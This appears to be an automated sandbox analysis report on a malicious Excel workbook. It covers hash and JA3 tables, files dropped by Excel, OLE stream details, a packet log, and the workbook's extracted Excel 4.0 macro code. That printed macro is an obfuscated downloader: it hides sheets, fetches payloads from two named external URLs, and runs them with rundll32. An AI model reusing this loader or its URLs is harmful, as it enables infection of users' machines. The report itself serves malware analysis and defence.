UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 135209 |
Entropy (8bit): | 5.363078467391509 |
Encrypted: | false |
SSDEEP: | 1536:pcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:9EQ9DQW+zwXO1 |
MD5: | F36D695FFC65C02CF6642D107DE3436E |
SHA1: | A6E39AE62834265B4937B554FF799614E6CBD2BC |
SHA-256: | 0A1F0B3E72F02FBF65827B4356D516DA6D321ACB4EB356F16657728C82584E94 |
SHA-512: | E21B9C58D9A8AE3B1CA665CB890568370C080F42E41072CED05ED5CA5C4A7507ADF0AC349300276F24EC4CDCE5BFB3D88FF53AB15A14443EFB4FE6D5D3BD9850 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 82869 |
Entropy (8bit): | 7.897086363765867 |
Encrypted: | false |
SSDEEP: | 1536:ILMCBgFqO57Lav5F/U2SiwFNfZ7pjS8ZiYhuiNde9kJY:04qO5PWzUWwtNm8ZUmY |
MD5: | 30C64BA689D114C1B1F07726F4B0F643 |
SHA1: | 6E453A1835195371901BDEC66BDDE4EAAC7B0DD2 |
SHA-256: | E9806EDFE4032C38F466EC4CB002167D14B5076F4197EBE861053E1A3BE5ECC9 |
SHA-512: | A285BEF29AB022AC67BB0E0D55E0A9DD1E04F16D301C5EA081AC7B7D6AA598875692E742FCAB3285A61BA2C51EC632AE8BAC04CE5E1BE2603899763B4512510E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.655853070338881 |
Encrypted: | false |
SSDEEP: | 12:8vVCXUM7t7gcduCH2BvOpM4IiujBF+WrjAZ/DYbDMSeuSeL44t2Y+xIBjKZm:8W9qmpTyVAZbcDG7aB6m |
MD5: | C28D5CC4959D0E1E0857E734A7985781 |
SHA1: | 02DD24C036CD987F04E14B31EF9ECDEDF4B75E50 |
SHA-256: | E1050433736C4F3D25755ECD8A6E34798FA29A618D0A58BC759B4D208756C19A |
SHA-512: | B48A5C3C3280FD958E5042B35A152E976770ED7C9AD959048870DF6790740DF9007302E66BDEDCBC0D33523995DDF3E74172DA641AC48EDB37D7638D779DD23C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 113 |
Entropy (8bit): | 4.71317481637129 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK |
MD5: | 827572951026F0F9437E31D866B8FF08 |
SHA1: | 0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6 |
SHA-256: | 493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B |
SHA-512: | F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 2210 |
Entropy (8bit): | 4.704393826342388 |
Encrypted: | false |
SSDEEP: | 48:8Ogw9qmp5Y5MiWlOkMkBB6pOgw9qmp5Y5MiWlOkMkBB6:8hcZiWlOdwKhcZiWlOdw |
MD5: | 1DBF118D07425F742972F80B6F479464 |
SHA1: | 348393828935581579897E182E3872D7033C7054 |
SHA-256: | 8996BA14F72BBE59CC466D0F4AB1911D640C453A9EC210C47DD791D3301037AB |
SHA-512: | 9A2021007A4621460404B0BDC89CC20E55E35F7F26F6F4AAAFD5F3961AA10539D9D8122016337C16769CE55F360D49B2CF54EF351A671C799CA325D283135453 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 222635 |
Entropy (8bit): | 5.628519548551312 |
Encrypted: | false |
SSDEEP: | 6144:a8rmdAIByzElbSRg3WCbgBeP5NmPTdbsizCnQC6VqCJ6KS8rmdAIByzElbSRg3WS:uLnQC6sCRY |
MD5: | 6F378E0FCB99595324566C5A91985656 |
SHA1: | 9059F775A49511C7A614F831EC90841008171C0D |
SHA-256: | 3026EAEDD6AFA59DF4C54D4CF1E1EE6A4891F32CC83B2B1AA95426B0F6458763 |
SHA-512: | 467D5668E72E6D3B891D261512CDDC4A53742B06E2D345BA8180F46FEFA23958BD77D0D6E188624B3F0132A3DB738C108BF774BD918A3571F55CFB98E9B42C06 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 2.0857713013138395 |
TrID: |
|
File name: | statistic-1496367785.xls |
File size: | 536064 |
MD5: | 7fb48e03b899f792be6c3118a46c5c8f |
SHA1: | 55445d13cd433121c6c2bfb31414b08e31e28a65 |
SHA256: | 1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f |
SHA512: | e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f |
SSDEEP: | 6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "statistic-1496367785.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05 18:17:20 |
Last Saved Time: | 2021-05-21 08:07:02 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.298297266065 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.277521975637 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . G . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 521856 |
Entropy: | 2.01072652781 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 29, 2021 17:47:16.877285957 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.034804106 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.035001040 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.036274910 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.193631887 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197438002 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197491884 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197526932 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197642088 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.197695971 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.224020958 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.381622076 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.381784916 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.384398937 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.581867933 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216415882 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216470957 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216506958 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216523886 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216546059 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216559887 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216577053 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216587067 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216610909 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216625929 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216738939 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216801882 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.220726967 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.297157049 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.378248930 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.455751896 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.455862999 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.456981897 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.614711046 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615437031 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615483999 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615523100 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615549088 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615612030 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.615669966 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.615679026 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.617918968 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.618040085 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.627181053 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.784462929 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.784598112 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.785315037 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.982614994 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349277020 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349569082 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349670887 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.355262995 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.358287096 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
